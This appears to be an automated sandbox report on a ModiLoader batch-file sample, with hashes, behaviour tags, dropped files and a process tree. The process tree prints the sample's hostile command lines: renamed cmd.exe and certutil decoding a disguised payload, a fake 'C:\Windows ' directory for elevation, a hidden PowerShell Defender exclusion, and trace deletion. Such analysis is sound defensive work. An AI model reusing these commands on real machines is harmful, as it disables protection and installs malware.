Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/11/2024, 12:21

General

  • Target

    A1 igazolás.cmd

  • Size

    3.7MB

  • MD5

    ebdec3ea8aada5aae98146f1b61a13ed

  • SHA1

    9ed537ca66a14b296010eccdde716b1b1a629fe2

  • SHA256

    6650a769ac035e23964c16c27df892d7725f415dee92582a4c7b4ceeef7345b2

  • SHA512

    c733cb6cf2754bf58ed5729357307dfb311c2e571b273c199a079d0ef96526a23fa8b0e235dc4ff07f77af61f94d32bb26561eb2b4affcd5b71c0c0c649a471e

  • SSDEEP

    49152:bWnHE/6TEgA8/WHmZI3Oqz0oXp2jrCbM799GY:2

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • ModiLoader Second Stage 61 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\A1 igazolás.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\System32\extrac32.exe
        C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
        3⤵
          PID:3888
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2700
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
            4⤵
              PID:2344
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\A1 igazolás.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2452
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\A1 igazolás.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
              4⤵
              • Executes dropped EXE
              PID:1424
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1204
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
              4⤵
              • Executes dropped EXE
              PID:4768
          • C:\Users\Public\Libraries\AnyDesk.PIF
            C:\Users\Public\Libraries\AnyDesk.PIF
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2672
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" "
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2304
              • C:\Windows\SysWOW64\esentutl.exe
                C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                5⤵
                  PID:4824
                • C:\Windows\SysWOW64\esentutl.exe
                  C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  5⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  PID:1204
                • C:\Users\Public\alpha.pif
                  C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2356
                • C:\Users\Public\alpha.pif
                  C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3836
                • C:\Users\Public\alpha.pif
                  C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:596
                  • C:\Users\Public\xpha.pif
                    C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:3232
                • C:\Windows \SysWOW64\per.exe
                  "C:\\Windows \\SysWOW64\\per.exe
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:4296
                  • C:\Windows\SYSTEM32\esentutl.exe
                    esentutl /y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe /d C:\\Users\\Public\\pha.pif /o
                    6⤵
                      PID:2596
                    • C:\Users\Public\pha.pif
                      C:\\Users\\Public\\pha.pif -WindowStyle hidden -Command Add-MpPreference -ExclusionPath 'C:\Users'
                      6⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1948
                  • C:\Users\Public\alpha.pif
                    C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1164
                  • C:\Users\Public\alpha.pif
                    C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1424
                  • C:\Users\Public\alpha.pif
                    C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:4252
                • C:\Windows\SysWOW64\colorcpl.exe
                  C:\Windows\System32\colorcpl.exe
                  4⤵
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of AdjustPrivilegeToken
                  PID:648
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                3⤵
                • Executes dropped EXE
                PID:2808
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                3⤵
                • Executes dropped EXE
                PID:1948
            • C:\Windows\SysWOW64\explorer.exe
              "C:\Windows\SysWOW64\explorer.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:1944
              • C:\Windows\SysWOW64\cmd.exe
                /c del "C:\Windows\SysWOW64\colorcpl.exe"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4804

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xdtns5f.bjq.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Public\AnyDesk.jpeg

            Filesize

            2.7MB

            MD5

            5701d503c293645679d856d0c494b94e

            SHA1

            71d664ad536d21adedfb84b3f9a16fc89165c1e5

            SHA256

            ce18404f625bf524666db80e18e715dd93c20ffb33508adfc0fe2dc1b9160d3c

            SHA512

            2805ab3b2cae50847d9d0e77ccc92fb8f819c8d1bfad2abf61bb5f442ad3f77c448c1669c3addddcd201148e8b5303093f853d1bc9c076727fa739d3a8154443

          • C:\Users\Public\Libraries\AnyDesk.PIF

            Filesize

            1.3MB

            MD5

            a8af2d572217e48eeebdf7dd135f90cd

            SHA1

            79130f4d66f04c8b6cf6d88307039478060da9e9

            SHA256

            5687ad48c8b8268f79cb520b632175beadd8cdf7b6e6431a636a518774d47faa

            SHA512

            3385579e987e19dac4a069510ab9204ecb98c6655d86680668eee05bcc4901809d9d3f5a30d0a4522dde45288dae1f2110988010389a4597ff4b623e5665c596

          • C:\Users\Public\Libraries\aoikokpI.cmd

            Filesize

            60KB

            MD5

            b87f096cbc25570329e2bb59fee57580

            SHA1

            d281d1bf37b4fb46f90973afc65eece3908532b2

            SHA256

            d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e

            SHA512

            72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

          • C:\Users\Public\alpha.exe

            Filesize

            283KB

            MD5

            8a2122e8162dbef04694b9c3e0b6cdee

            SHA1

            f1efb0fddc156e4c61c5f78a54700e4e7984d55d

            SHA256

            b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

            SHA512

            99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

          • C:\Users\Public\alpha.pif

            Filesize

            231KB

            MD5

            d0fce3afa6aa1d58ce9fa336cc2b675b

            SHA1

            4048488de6ba4bfef9edf103755519f1f762668f

            SHA256

            4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22

            SHA512

            80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

          • C:\Users\Public\kn.exe

            Filesize

            1.6MB

            MD5

            bd8d9943a9b1def98eb83e0fa48796c2

            SHA1

            70e89852f023ab7cde0173eda1208dbb580f1e4f

            SHA256

            8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

            SHA512

            95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

          • C:\Users\Public\pha.pif

            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Public\xpha.pif

            Filesize

            18KB

            MD5

            b3624dd758ccecf93a1226cef252ca12

            SHA1

            fcf4dad8c4ad101504b1bf47cbbddbac36b558a7

            SHA256

            4aaa74f294c15aeb37ada8185d0dead58bd87276a01a814abc0c4b40545bf2ef

            SHA512

            c613d18511b00fa25fc7b1bdde10d96debb42a99b5aaab9e9826538d0e229085bb371f0197f6b1086c4f9c605f01e71287ffc5442f701a95d67c232a5f031838

          • C:\Windows \SysWOW64\NETUTILS.dll

            Filesize

            115KB

            MD5

            fc9b64a2b1006891bf39ebf395b4eba8

            SHA1

            0e98ba291d77ff8a57b5ebe198ff0c2e6c2bea00

            SHA256

            1093d0809ed5223c8ea2d723032c0ee2bfd1d971ad6ac69904983ec545000b3d

            SHA512

            9d5a9716b71b436dd465cdf8ed8471747828420cec7c5dad3406072e53f8de6e31253968e55ef49dc19a8245993b00164f193a3752cc16fce3887c4737db906d

          • C:\Windows \SysWOW64\per.exe

            Filesize

            94KB

            MD5

            869640d0a3f838694ab4dfea9e2f544d

            SHA1

            bdc42b280446ba53624ff23f314aadb861566832

            SHA256

            0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

            SHA512

            6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

          • memory/1948-341-0x0000019655790000-0x00000196557B2000-memory.dmp

            Filesize

            136KB

          • memory/2672-63-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-53-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-51-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-77-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-83-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-91-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-90-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-88-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-86-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-84-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-81-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-80-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-79-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-78-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-76-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-75-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-73-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-72-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-71-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-70-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-68-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-65-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-64-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-46-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-34-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-61-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-60-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-58-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-55-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-92-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-89-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-32-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-87-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-85-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-52-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-82-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-74-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-49-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-69-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-48-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-67-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-47-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-66-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-62-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-59-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-44-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-56-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-54-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-50-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-39-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-38-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-45-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-37-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-57-0x0000000000400000-0x000000000055E000-memory.dmp

            Filesize

            1.4MB

          • memory/2672-43-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-36-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-42-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-41-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-33-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-40-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-35-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-28-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB

          • memory/2672-30-0x0000000002CE0000-0x0000000003CE0000-memory.dmp

            Filesize

            16.0MB